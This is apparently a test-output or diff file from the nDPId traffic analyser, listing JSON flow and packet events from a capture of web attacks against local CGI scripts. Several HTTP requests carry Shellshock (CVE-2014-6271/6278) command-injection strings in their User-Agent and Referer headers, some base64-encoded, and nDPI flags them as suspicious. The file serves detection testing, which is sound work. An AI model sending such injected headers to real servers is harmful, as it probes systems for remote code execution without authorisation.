+01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277389,"flow_last_seen":1576420277389,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277389,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50450,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/banner.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277391,"flow_last_seen":1576420277391,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277391,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50452,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00765{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":1,"flow_last_seen":1576420277391,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277391,"pkt":"AAAAAAAAAAAAAAAACABFAAEJF\/tAAEAGI\/J\/AAABfwAAAcUUH5B+1S87jYTLUoAYAED+\/QAAAQEICp1m\/bedZv23R0VUIC9ib29rLmNnaSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277391,"flow_last_seen":1576420277391,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277391,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50452,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/book.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277391,"flow_last_seen":1576420277391,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277391,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50452,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/book.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277392,"flow_last_seen":1576420277392,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277392,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50454,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_packet_id":1,"flow_last_seen":1576420277392,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277392,"pkt":"AAAAAAAAAAAAAAAACABFAAEM+RhAAEAGQtF\/AAABfwAAAcUWH5DPIMHTViTvW4AYAED\/AAAAAQEICp1m\/bidZv24R0VUIC9jZ2lpbmZvLmNnaSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"} -01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277392,"flow_last_seen":1576420277392,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277392,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50454,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgiinfo.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277392,"flow_last_seen":1576420277392,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277392,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50454,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgiinfo.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277394,"flow_last_seen":1576420277394,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277394,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50456,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_packet_id":1,"flow_last_seen":1576420277394,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277394,"pkt":"AAAAAAAAAAAAAAAACABFAAELY9VAAEAG2BV\/AAABfwAAAcUYH5AazFsY4\/xNyIAYAED+\/wAAAQEICp1m\/bqdZv26R0VUIC9jZ2l0ZXN0LnB5IEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277394,"flow_last_seen":1576420277394,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277394,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50456,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgitest.py","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277394,"flow_last_seen":1576420277394,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277394,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50456,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgitest.py","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277395,"flow_last_seen":1576420277395,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277395,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50458,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_packet_id":1,"flow_last_seen":1576420277395,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277395,"pkt":"AAAAAAAAAAAAAAAACABFAAEMSAFAAEAG8+h\/AAABfwAAAcUaH5B7UH87Bk0XQYAYAED\/AAAAAQEICp1m\/budZv27R0VUIC9jZ2lfd3JhcHBlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"} -01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277395,"flow_last_seen":1576420277395,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277395,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50458,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi_wrapper","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277395,"flow_last_seen":1576420277395,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277395,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50458,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi_wrapper","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277398,"flow_last_seen":1576420277398,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277398,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50460,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_packet_id":1,"flow_last_seen":1576420277398,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277398,"pkt":"AAAAAAAAAAAAAAAACABFAAEMKndAAEAGEXN\/AAABfwAAAcUcH5BMbxKxdmdFb4AYAED\/AAAAAQEICp1m\/b6dZv2+R0VUIC9jb250YWN0LmNnaSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277398,"flow_last_seen":1576420277398,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277398,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50460,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/contact.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277398,"flow_last_seen":1576420277398,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277398,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50460,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/contact.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277399,"flow_last_seen":1576420277399,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277399,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50462,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":1,"flow_last_seen":1576420277399,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277399,"pkt":"AAAAAAAAAAAAAAAACABFAAEK9YVAAEAGRmZ\/AAABfwAAAcUeH5Br181GQEYmBIAYAED+\/gAAAQEICp1m\/b+dZv2\/R0VUIC9jb3VudC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} -01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277399,"flow_last_seen":1576420277399,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277399,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50462,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/count.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277399,"flow_last_seen":1576420277399,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277399,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50462,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/count.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277401,"flow_last_seen":1576420277401,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277401,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50464,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":1,"flow_last_seen":1576420277401,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1576420277401,"pkt":"AAAAAAAAAAAAAAAACABFAAETxAhAAEAGd9p\/AAABfwAAAcUgH5CMzvzBXE4TboAYAED\/BwAAAQEICp1m\/cGdZv3BR0VUIC9kZWZhdWx0d2VicGFnZS5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277401,"flow_last_seen":1576420277401,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277401,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50464,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/defaultwebpage.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
